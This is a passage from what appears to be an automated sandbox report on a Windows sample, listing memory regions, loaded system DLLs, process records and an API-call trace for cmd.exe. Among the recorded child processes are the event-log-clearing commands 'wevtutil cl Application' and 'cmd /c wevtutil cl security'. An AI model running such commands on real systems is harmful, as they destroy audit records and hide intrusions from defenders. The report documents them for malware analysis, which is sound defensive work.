"" Region: id = 270 start_va = 0xf192e0000 end_va = 0xf1939dfff entry_point = 0xf192e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 271 start_va = 0xf193a0000 end_va = 0xf193dffff entry_point = 0x0 region_type = private name = "private_0x0000000f193a0000" filename = "" Region: id = 272 start_va = 0x7ff6c3c80000 end_va = 0x7ff6c3d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c80000" filename = "" Region: id = 273 start_va = 0x7ff6c3dac000 end_va = 0x7ff6c3dadfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dac000" filename = "" Region: id = 274 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 275 start_va = 0xf19270000 end_va = 0xf19276fff entry_point = 0x0 region_type = private name = "private_0x0000000f19270000" filename = "" Region: id = 276 start_va = 0xf193e0000 end_va = 0xf193e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f193e0000" filename = "" Region: id = 277 start_va = 0xf193f0000 end_va = 0xf193f6fff entry_point = 0x0 region_type = private name = "private_0x0000000f193f0000" filename = "" Region: id = 278 start_va = 0xf196f0000 end_va = 0xf196fffff entry_point = 0x0 region_type = private name = "private_0x0000000f196f0000" filename = "" Region: id = 279 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 280 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 281 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 282 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 283 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 284 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 285 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 286 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 287 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 288 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 289 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 290 start_va = 0xf19400000 end_va = 0xf19400fff entry_point = 0x0 region_type = private name = "private_0x0000000f19400000" filename = "" Region: id = 291 start_va = 0xf19410000 end_va = 0xf19410fff entry_point = 0x0 region_type = private name = "private_0x0000000f19410000" filename = "" Region: id = 292 start_va = 0xf19420000 end_va = 0xf1945ffff entry_point = 0x0 region_type = private name = "private_0x0000000f19420000" filename = "" Region: id = 293 start_va = 0xf195f0000 end_va = 0xf195fffff entry_point = 0x0 region_type = private name = "private_0x0000000f195f0000" filename = "" Region: id = 294 start_va = 0xf19700000 end_va = 0xf19887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f19700000" filename = "" Region: id = 295 start_va = 0xf19890000 end_va = 0xf19a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f19890000" filename = "" Region: id = 296 start_va = 0xf19a20000 end_va = 0xf1ae1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f19a20000" filename = "" Region: id = 297 start_va = 0x7ff6c3daa000 end_va = 0x7ff6c3dabfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3daa000" filename = "" Region: id = 298 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 299 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 300 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 301 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 302 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 303 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 304 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 305 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 306 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Thread: id = 6 os_tid = 0x788 Thread: id = 7 os_tid = 0x438 Thread: id = 8 os_tid = 0x488 Process: id = "4" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x6e599000" os_pid = "0x670" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x774" cmd_line = "wevtutil cl Application" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 315 start_va = 0xab0000 end_va = 0xab1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 316 start_va = 0xac0000 end_va = 0xaeefff entry_point = 0xac0000 region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 317 start_va = 0xaf0000 end_va = 0x4aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 318 start_va = 0x4af0000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 319 start_va = 0x4b10000 end_va = 0x4b23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 320 start_va = 0x4b30000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 321 start_va = 0x4b70000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 322 start_va = 0x4bb0000 end_va = 0x4bb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bb0000" filename = "" Region: id = 323 start_va = 0x4bc0000 end_va = 0x4bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bc0000" filename = "" Region: id = 324 start_va = 0x4bd0000 end_va = 0x4bd1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 325 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 326 start_va = 0x7fd70000 end_va = 0x7fd92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fd70000" filename = "" Region: id = 327 start_va = 0x7fd99000 end_va = 0x7fd99fff entry_point = 0x0 region_type = private name = "private_0x000000007fd99000" filename = "" Region: id = 328 start_va = 0x7fd9a000 end_va = 0x7fd9cfff entry_point = 0x0 region_type = private name = "private_0x000000007fd9a000" filename = "" Region: id = 329 start_va = 0x7fd9d000 end_va = 0x7fd9dfff entry_point = 0x0 region_type = private name = "private_0x000000007fd9d000" filename = "" Region: id = 330 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 331 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 332 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 333 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 334 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 335 start_va = 0x4ca0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 336 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 337 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 338 start_va = 0x4cd0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 339 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 340 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 341 start_va = 0x4af0000 end_va = 0x4af3fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 342 start_va = 0x4b00000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 343 start_va = 0x4be0000 end_va = 0x4c9dfff entry_point = 0x4be0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 344 start_va = 0x4dd0000 end_va = 0x4e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 345 start_va = 0x4e10000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 346 start_va = 0x74a20000 end_va = 0x74a6dfff entry_point = 0x74a20000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 347 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 348 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 349 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 350 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 351 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 352 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 353 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 354 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 355 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 356 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 357 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 358 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 359 start_va = 0x7fc70000 end_va = 0x7fd6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc70000" filename = "" Region: id = 360 start_va = 0x7fd96000 end_va = 0x7fd98fff entry_point = 0x0 region_type = private name = "private_0x000000007fd96000" filename = "" Thread: id = 10 os_tid = 0x300 Thread: id = 11 os_tid = 0xbd8 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ed84000" os_pid = "0x168" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c wevtutil cl security" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 361 start_va = 0x260000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 362 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 363 start_va = 0x290000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 364 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 365 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 366 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 367 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 368 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 369 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 370 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 371 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 372 start_va = 0x7f4c0000 end_va = 0x7f4e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4c0000" filename = "" Region: id = 373 start_va = 0x7f4e3000 end_va = 0x7f4e3fff entry_point = 0x0 region_type = private name = "private_0x000000007f4e3000" filename = "" Region: id = 374 start_va = 0x7f4ec000 end_va = 0x7f4eefff entry_point = 0x0 region_type = private name = "private_0x000000007f4ec000" filename = "" Region: id = 375 start_va = 0x7f4ef000 end_va = 0x7f4effff entry_point = 0x0 region_type = private name = "private_0x000000007f4ef000" filename = "" Region: id = 376 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 377 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 378 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 379 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 380 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 381 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 382 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 383 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 384 start_va = 0x4550000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 385 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 426 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 427 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 428 start_va = 0x4650000 end_va = 0x470dfff entry_point = 0x4650000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 429 start_va = 0x4710000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 430 start_va = 0x4890000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 431 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 432 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 433 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 434 start_va = 0x7f3c0000 end_va = 0x7f4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3c0000" filename = "" Region: id = 435 start_va = 0x7f4e9000 end_va = 0x7f4ebfff entry_point = 0x0 region_type = private name = "private_0x000000007f4e9000" filename = "" Region: id = 436 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 437 start_va = 0x280000 end_va = 0x283fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 438 start_va = 0x48a0000 end_va = 0x4bd6fff entry_point = 0x48a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 12 os_tid = 0x350 [0094.235] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0094.235] __set_app_type (_Type=0x1) [0094.235] __p__fmode () returned 0x77ac4d6c [0094.235] __p__commode () returned 0x77ac5b1c [0094.235] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0094.236] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0094.236] GetCurrentThreadId () returned 0x350 [0094.236] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x350) returned 0x84 [0094.236] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0094.236] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0094.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.239] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x450fd9c | out: phkResult=0x450fd9c*=0x0) returned 0x2 [0094.239] VirtualQuery (in: lpAddress=0x450fda3, lpBuffer=0x450fd54, dwLength=0x1c | out: lpBuffer=0x450fd54*(BaseAddress=0x450f000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.239] VirtualQuery (in: lpAddress=0x4410000, lpBuffer=0x450fd54, dwLength=0x1c | out: lpBuffer=0x450fd54*(BaseAddress=0x4410000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.239] VirtualQuery (in: lpAddress=0x4411000, lpBuffer=0x450fd54, dwLength=0x1c | out: lpBuffer=0x450fd54*(BaseAddress=0x4411000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.239] VirtualQuery (in: lpAddress=0x4413000, lpBuffer=0x450fd54, dwLength=0x1c | out: lpBuffer=0x450fd54*(BaseAddress=0x4413000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.239] VirtualQuery (in: lpAddress=0x4510000, lpBuffer=0x450fd54, dwLength=0x1c | out: lpBuffer=0x450fd54*(BaseAddress=0x4510000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.239] GetConsoleOutputCP () returned 0x1b5 [0094.239] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0094.240] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0094.240] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.240] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.240] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0094.240] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.240] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0094.240] _get_osfhandle (_FileHandle=0) returned 0x38 [0094.240] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0094.241] _get_osfhandle (_FileHandle=0) returned 0x38 [0094.241] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0094.241] GetEnvironmentStringsW () returned 0x4557d58* [0094.241] FreeEnvironmentStringsA (penv="A") returned 1 [0094.241] GetEnvironmentStringsW () returned 0x4557d58* [0094.241] FreeEnvironmentStringsA (penv="A") returned 1 [0094.241] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450ed00 | out: phkResult=0x450ed00*=0x94) returned 0x0 [0094.241] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x48, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.241] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x1, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.241] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450ed04, 